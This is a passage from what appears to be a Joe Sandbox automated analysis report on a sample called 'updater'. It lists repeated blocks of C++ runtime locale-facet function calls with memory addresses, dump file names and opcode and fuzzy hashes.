                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
                                  • String ID:
                                  • API String ID: 4267825564-0
                                  • Opcode ID: 0c2a2805474283f9118e22ade9ed313875dd9fe1bf2c9c5679f104486bac378c
                                  • Instruction ID: 8c131bae7156868acf6c4509a81b227568484c124f3409653835c8eb31b86925
                                  • Opcode Fuzzy Hash: 0c2a2805474283f9118e22ade9ed313875dd9fe1bf2c9c5679f104486bac378c
                                  • Instruction Fuzzy Hash: B7010435D00116DBCB06EB698844ABEB775BFA0714F18415FD8016B2F0CF348E45DB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C01A
                                  • int.LIBCPMT ref: 0140C031
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • ctype.LIBCPMT ref: 0140C054
                                  • std::_Facet_Register.LIBCPMT ref: 0140C06B
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C08B
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C098
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype
                                  • String ID:
                                  • API String ID: 3097546199-0
                                  • Opcode ID: f921e2e470434dff8cee1f1fe3befcbdf973cb7fe0eae63d73535e7bc8175484
                                  • Instruction ID: 492d5e8b1bc1511d21e514e103a92bcdb34725ea79b8797e6ceba777750fa4ef
                                  • Opcode Fuzzy Hash: f921e2e470434dff8cee1f1fe3befcbdf973cb7fe0eae63d73535e7bc8175484
                                  • Instruction Fuzzy Hash: FA012675900116DBCB06EBA9C844ABEBB70BF61724F18825ED810673F0CF348E09C781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C0AF
                                  • int.LIBCPMT ref: 0140C0C6
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • messages.LIBCPMT ref: 0140C0E9
                                  • std::_Facet_Register.LIBCPMT ref: 0140C100
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C120
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C12D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
                                  • String ID:
                                  • API String ID: 4267825564-0
                                  • Opcode ID: e9708fb2d5c35d02fcc770d67496fad35aac874373949c355657ef6d02ce0781
                                  • Instruction ID: 17d10539805a12abf2dd4d89159b1c2814f114af2b38a332638d852d059e8185
                                  • Opcode Fuzzy Hash: e9708fb2d5c35d02fcc770d67496fad35aac874373949c355657ef6d02ce0781
                                  • Instruction Fuzzy Hash: D101C075D00116DBCB06EBAAD844AAEBB74BFA0714F28416ED8116B2F1CF749E05CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C557
                                  • int.LIBCPMT ref: 0140C56E
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • moneypunct.LIBCPMT ref: 0140C591
                                  • std::_Facet_Register.LIBCPMT ref: 0140C5A8
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C5C8
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C5D5
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                  • String ID:
                                  • API String ID: 1973839345-0
                                  • Opcode ID: a30acef829e6c8c98bb2cc2faa458fbd2aec2ccf57414465d959f56a94a562be
                                  • Instruction ID: fbdfb74f4809fa88de22d736a2fcce886b55774ca0c5133685ce57ee6b440583
                                  • Opcode Fuzzy Hash: a30acef829e6c8c98bb2cc2faa458fbd2aec2ccf57414465d959f56a94a562be
                                  • Instruction Fuzzy Hash: 2001443AC00226CBCB02ABAA8840AAEB760BF60624F18415EE810673F0DF309A01D781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C5EC
                                  • int.LIBCPMT ref: 0140C603
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • moneypunct.LIBCPMT ref: 0140C626
                                  • std::_Facet_Register.LIBCPMT ref: 0140C63D
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C65D
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C66A
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                  • String ID:
                                  • API String ID: 1973839345-0
                                  • Opcode ID: 0c76a3ce3505f89233f24614890ad9bd711e764720ad35eb3fbc206aba728416
                                  • Instruction ID: 55e48ebea755995f74c825644d3ff1e6b6c5a945ebdeade1f0d0b4fa7c0ca529
                                  • Opcode Fuzzy Hash: 0c76a3ce3505f89233f24614890ad9bd711e764720ad35eb3fbc206aba728416
                                  • Instruction Fuzzy Hash: 7F010035D00116CBCB16EBA98850ABEBB70BFA0724F28465EE806673F0CF749A01D781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C42D
                                  • int.LIBCPMT ref: 0140C444
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • moneypunct.LIBCPMT ref: 0140C467
                                  • std::_Facet_Register.LIBCPMT ref: 0140C47E
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C49E
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C4AB
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                  • String ID:
                                  • API String ID: 1973839345-0
                                  • Opcode ID: 48fb02056b33801482f7c1a2cfd524a41838280a5255826d4065508062016bc1
                                  • Instruction ID: 9e4a313b8038aa5451d464635e45aae3bc1d8aa622ebf079ae027d90ea42377b
                                  • Opcode Fuzzy Hash: 48fb02056b33801482f7c1a2cfd524a41838280a5255826d4065508062016bc1
                                  • Instruction Fuzzy Hash: 9701E175D0011ADBCB16EB698844ABEB764BFA4B24F19416EE805672E0CB348A05CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C4C2
                                  • int.LIBCPMT ref: 0140C4D9
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • moneypunct.LIBCPMT ref: 0140C4FC
                                  • std::_Facet_Register.LIBCPMT ref: 0140C513
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C533
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C540
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                  • String ID:
                                  • API String ID: 1973839345-0
                                  • Opcode ID: 52c733003f1691b2072b49a9cd1ed078cd3d41b514af76f89d39eee0a82f07fe
                                  • Instruction ID: 257d6672b0594530ecc121c950e12a90be63fb8fca1083145bddbbd8a5129de2
                                  • Opcode Fuzzy Hash: 52c733003f1691b2072b49a9cd1ed078cd3d41b514af76f89d39eee0a82f07fe
                                  • Instruction Fuzzy Hash: EC012635900226DBCB06EB69C840ABE7770BFA4724F28015ED801673F0DF349E01C781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C96A
                                  • int.LIBCPMT ref: 0140C981
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • numpunct.LIBCPMT ref: 0140C9A4
                                  • std::_Facet_Register.LIBCPMT ref: 0140C9BB
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C9DB
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C9E8
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
                                  • String ID:
                                  • API String ID: 1910018792-0
                                  • Opcode ID: 5604109eab3387f01ba7bce5809e0fc0fab4577873a7e6202591a6b03b55f841
                                  • Instruction ID: 2973672f339d064bbf5172a30a33f5293cc84e6b1672406cec79ad6995e8e70f
                                  • Opcode Fuzzy Hash: 5604109eab3387f01ba7bce5809e0fc0fab4577873a7e6202591a6b03b55f841
                                  • Instruction Fuzzy Hash: 3701C035D00116DBCB06EB6A8844ABEBB71BFA0614F18425FE811A73F0CF349A05DB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140C8D5
                                  • int.LIBCPMT ref: 0140C8EC
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • numpunct.LIBCPMT ref: 0140C90F
                                  • std::_Facet_Register.LIBCPMT ref: 0140C926
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C946
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C953
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
                                  • String ID:
                                  • API String ID: 1910018792-0
                                  • Opcode ID: b6970391ae377bb2ad9a2c0f45f2b30231866e6be55c80c93cb7dfc7aa25e3b5
                                  • Instruction ID: ee9c4666404bd1688d4e0ce11e90403c38fe40a1fa67a8c7a0d972f35dc1b489
                                  • Opcode Fuzzy Hash: b6970391ae377bb2ad9a2c0f45f2b30231866e6be55c80c93cb7dfc7aa25e3b5
                                  • Instruction Fuzzy Hash: FC01C075900116CBCB06AB69C854AAEBB74BFA0728F28415ED815673F1CF749E05C792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 01406F50
                                  • int.LIBCPMT ref: 01406F67
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • ctype.LIBCPMT ref: 01406F8A
                                  • std::_Facet_Register.LIBCPMT ref: 01406FA1
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 01406FC1
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 01406FCE
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype
                                  • String ID:
                                  • API String ID: 3097546199-0
                                  • Opcode ID: 1a30666df0c82139b70c4d718661d830eed1efa4e6436ff13633d29ac05b3568
                                  • Instruction ID: 4f6bf409df68c54e2d28dc16d292ed4c3b653a7d08c407b74506125f7a4e122a
                                  • Opcode Fuzzy Hash: 1a30666df0c82139b70c4d718661d830eed1efa4e6436ff13633d29ac05b3568
                                  • Instruction Fuzzy Hash: 90012635D001169BDB06EB69C850ABEB775BF60724F29001EE801A73F0CF349E15CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 01406EBB
                                  • int.LIBCPMT ref: 01406ED2
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • codecvt.LIBCPMT ref: 01406EF5
                                  • std::_Facet_Register.LIBCPMT ref: 01406F0C
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 01406F2C
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 01406F39
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
                                  • String ID:
                                  • API String ID: 3595785899-0
                                  • Opcode ID: 58451db1d6284c5cbd0bd906128627faeea47854860e63964d059772cea60185
                                  • Instruction ID: 839e9c9d12b041fb143275886084c68e2685151c5f0131590ecb01c84c6ce48d
                                  • Opcode Fuzzy Hash: 58451db1d6284c5cbd0bd906128627faeea47854860e63964d059772cea60185
                                  • Instruction Fuzzy Hash: EF010435900217DBCB16EB6AD810ABEBB64BFA0724F19001ED901673F0CF749E41CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140710F
                                  • int.LIBCPMT ref: 01407126
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • numpunct.LIBCPMT ref: 01407149
                                  • std::_Facet_Register.LIBCPMT ref: 01407160
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 01407180
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140718D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
                                  • String ID:
                                  • API String ID: 1910018792-0
                                  • Opcode ID: c314435fbeb7f8e84b075f25ab200c7e6bff9b0be3b122b01dd9e658e16ec2b2
                                  • Instruction ID: 8acb9d4950b39e6199dbac4aaefba3abda2831c9f4b1ee8d58e60d79ebc81d82
                                  • Opcode Fuzzy Hash: c314435fbeb7f8e84b075f25ab200c7e6bff9b0be3b122b01dd9e658e16ec2b2
                                  • Instruction Fuzzy Hash: AC01C435D002169BDB16EF69D804ABEB771BF60615F18401ED8556B3F0CF349E01C782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 01419428
                                  • int.LIBCPMT ref: 0141943F
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • collate.LIBCPMT ref: 01419462
                                  • std::_Facet_Register.LIBCPMT ref: 01419479
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 01419499
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 014194A6
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercollate
                                  • String ID:
                                  • API String ID: 3223962878-0
                                  • Opcode ID: 418b957078914329848d71b5028e701337d6ab76d292a4bc582426ac72703803
                                  • Instruction ID: 3c7134edf476740094a1356776b3f75cdc2fbd448af89fba2b2c24220f706344
                                  • Opcode Fuzzy Hash: 418b957078914329848d71b5028e701337d6ab76d292a4bc582426ac72703803
                                  • Instruction Fuzzy Hash: 93010035D002169BDB16EF69C810AAEBB61BFA4728F19401ED805673F8CF349E05CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 014194BD
                                  • int.LIBCPMT ref: 014194D4
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • messages.LIBCPMT ref: 014194F7
                                  • std::_Facet_Register.LIBCPMT ref: 0141950E
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0141952E
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0141953B
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
                                  • String ID:
                                  • API String ID: 4267825564-0
                                  • Opcode ID: 3b5033539ef817c51e5b4c0f19d5d9bf165042ce4e63c8aea5774f4f96179958
                                  • Instruction ID: 1d1e77c4bf23de5cdf2ee2db2ede1267b80f99ce5592f7fb5b866d984e005784
                                  • Opcode Fuzzy Hash: 3b5033539ef817c51e5b4c0f19d5d9bf165042ce4e63c8aea5774f4f96179958
                                  • Instruction Fuzzy Hash: 4E01C47690021ACBCB05EB69C824ABEB764BFA0B28F18410ED801672F9CF349A05C781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 01419711
                                  • int.LIBCPMT ref: 01419728
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • moneypunct.LIBCPMT ref: 0141974B
                                  • std::_Facet_Register.LIBCPMT ref: 01419762
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 01419782
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0141978F
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                  • String ID:
                                  • API String ID: 1973839345-0
                                  • Opcode ID: 696e1405290a0b86c50c409017ecc723e63dfb1c9d566bdee85818bc00ff64cb
                                  • Instruction ID: 926323da058ed7e66ccfa16069bb128a23a5b8f2103eacc0ac922ad332ac8fd7
                                  • Opcode Fuzzy Hash: 696e1405290a0b86c50c409017ecc723e63dfb1c9d566bdee85818bc00ff64cb
                                  • Instruction Fuzzy Hash: 5401AD35D00216DBCB16AF69C814AAEBBB1BFA0B18F29400ED915672E5DB349A05CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0141967C
                                  • int.LIBCPMT ref: 01419693
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • moneypunct.LIBCPMT ref: 014196B6
                                  • std::_Facet_Register.LIBCPMT ref: 014196CD
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 014196ED
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 014196FA
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
